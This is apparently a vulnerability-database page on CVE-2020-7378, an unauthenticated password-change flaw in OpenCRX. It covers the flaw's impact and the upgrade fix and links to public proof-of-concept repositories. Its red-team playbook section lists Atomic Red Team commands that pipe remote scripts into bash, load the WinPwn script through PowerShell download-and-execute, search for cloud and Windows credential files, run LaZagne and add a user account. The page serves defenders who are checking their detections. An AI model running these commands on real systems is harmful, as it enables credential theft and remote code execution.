CVE-2020-7378
Overview
This vulnerability is an authentication bypass allowing unauthorized password changes due to insufficient verification controls. The root cause lies in the OpenCRX user management component failing to properly authenticate requests that modify user credentials. Specifically, the password change functionality does not validate the identity or privileges of the requester, enabling unauthenticated actors to alter passwords arbitrarily.
Vulnerability Description
CRIXP OpenCRX version 4.30 and 5.0-20200717 and prior suffers from an unverified password change vulnerability. An attacker who is able to connect to the affected OpenCRX instance can change the password of any user, including admin-Standard, to any chosen value. This issue was resolved in version 5.0-20200904, released September 4, 2020.
Impact
An unauthenticated attacker with network access can arbitrarily change any user's password, including privileged administrative accounts, effectively gaining unauthorized control over the system. This enables full account takeover without user interaction or prior authentication, facilitating lateral movement and potential data compromise. The CVSS vector indicates no privileges or user interaction are required (AV:N/AC:L/PR:N/UI:N), highlighting the ease of exploitation and critical impact on confidentiality and integrity.
Solution
Upgrade OpenCRX to version 5.0-20200904 or later, where the password change vulnerability is resolved. Refer to the Rapid7 advisory at https://blog.rapid7.com/2020/11/24/cve-2020-7378-opencrx-unverified-password-change/ for detailed patch instructions and verification steps. No alternative mitigations are documented; applying the vendor-released patch is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in OpenCRX versions 4.30 and 5.0-20200717 and prior is characterized by an unverified password change mechanism. This flaw allows an attacker with network access to the affected instance to alter the passwords of any user account, including those with administrative privileges, without requiring any form of authentication or verification. The underlying issue stems from inadequate validation processes in the password change functionality, which fails to ensure that the request is legitimate and originates from an authorized user. This oversight poses a significant risk, as it undermines the integrity of user authentication and can lead to unauthorized access to sensitive data and system controls.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage a direct connection to the OpenCRX instance, which may be exposed to the internet or accessible within an internal network. By sending crafted requests to the password change endpoint, the attacker can manipulate user credentials at will. Scenarios may include a malicious insider who has local network access or an external attacker who has discovered an exposed service. Once the attacker gains control over an administrative account, they could further escalate their privileges, modify system configurations, access confidential information, or even disable security measures, leading to a complete compromise of the system.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on OpenCRX for customer relationship management. The potential for unauthorized access to administrative accounts means that attackers could manipulate customer data, alter business operations, or disrupt services. This could result in financial losses, reputational damage, and legal repercussions, especially if sensitive customer information is exposed or misused. The high CVSS score of 9.1 reflects the critical nature of this vulnerability, indicating that organizations must prioritize its remediation to safeguard their systems and data.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is essential to upgrade to the patched version of OpenCRX, which addresses this flaw and reinforces the password change process with proper validation mechanisms. Regularly auditing and monitoring access logs can help identify any unauthorized attempts to change passwords or access sensitive accounts. Additionally, organizations should enforce strong access controls, such as multi-factor authentication, to further protect user accounts from unauthorized access. Security awareness training for employees can also play a crucial role in preventing exploitation, as it helps users recognize potential phishing attempts or other tactics that attackers may use to gain access to the system.
In conclusion, the unverified password change vulnerability in OpenCRX represents a significant threat to organizations utilizing this software. The ease of exploitation and the potential for severe consequences highlight the necessity for immediate action to mitigate risks. By adopting a proactive approach to security, including timely updates, monitoring, and user education, organizations can better protect themselves against such vulnerabilities and maintain the integrity of their systems.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Opencrx | Opencrx | All |
cpe:2.3:a:opencrx:opencrx:*:*:*:*:*:*:*:*
|
|
|
Opencrx | Opencrx | 5.0 |
cpe:2.3:a:opencrx:opencrx:5.0:20200714:*:*:*:*:*:*
|
|
|
Opencrx | Opencrx | 5.0 |
cpe:2.3:a:opencrx:opencrx:5.0:20200715:*:*:*:*:*:*
|
|
|
Opencrx | Opencrx | 5.0 |
cpe:2.3:a:opencrx:opencrx:5.0:20200717:*:*:*:*:*:*
|
|
|
Opencrx | Opencrx | 5.0.0 |
cpe:2.3:a:opencrx:opencrx:5.0.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ruthvikvegunta/openCRX-CVE-2020-7378
Exploits Password Reset Vulnerability in OpenCRX, CVE-2020-7378. Also maintains Stealth by deleting all the password res...
|
ruthvikvegunta | 5 | 1 | 2021-07-06 | View |
|
loganpkinfosec/CVE-2020-7378
|
loganpkinfosec | 0 | 0 | 2025-06-27 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-7378 |
| blog.rapid7.com |
GitHub CVE
x_refsource_MISC
|
https://blog.rapid7.com/2020/11/24/cve-2020-7378-opencrx-unverified-password-change/ |